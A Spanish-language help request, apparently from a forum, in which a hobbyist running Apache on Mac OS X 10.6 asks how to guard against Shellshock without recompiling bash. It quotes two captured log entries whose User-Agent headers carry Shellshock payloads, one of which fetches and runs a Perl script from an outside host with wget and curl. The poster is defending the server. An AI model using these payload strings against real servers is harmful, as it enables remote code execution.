Estoy ejecutando un pequeño servidor HTTP (Apache) desde mi Mac, principalmente como un hobby. Si se compromete, no es el fin del mundo, pero es algo que sin duda me gustaría prevenir. Configuré un trabajo launchctl para revisar el archivo de registro de Apache en busca de posibles solicitudes relacionadas con Shellshock y anoche recibí dos entradas relacionadas:
82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
El primero parece inofensivo y la IP alberga un sitio web de aspecto muy legítimo que afirma que sus solicitudes son solo para fines de investigación. La segunda es una historia diferente, sin embargo, intenta descargar y ejecutar un script Perl. Afortunadamente, no tengo el wget instalado, por lo que este ataque no funcionó, pero parece que es solo cuestión de tiempo antes de que reciba una solicitud como esta que haga algún daño.
Apple acaba de lanzar parches para OS X 10.7 y posteriores, pero desafortunadamente estoy ejecutando 10.6. ¿Qué medidas simples y confiables puedo tomar (es decir, no recompiling bash ) para reducir mis riesgos?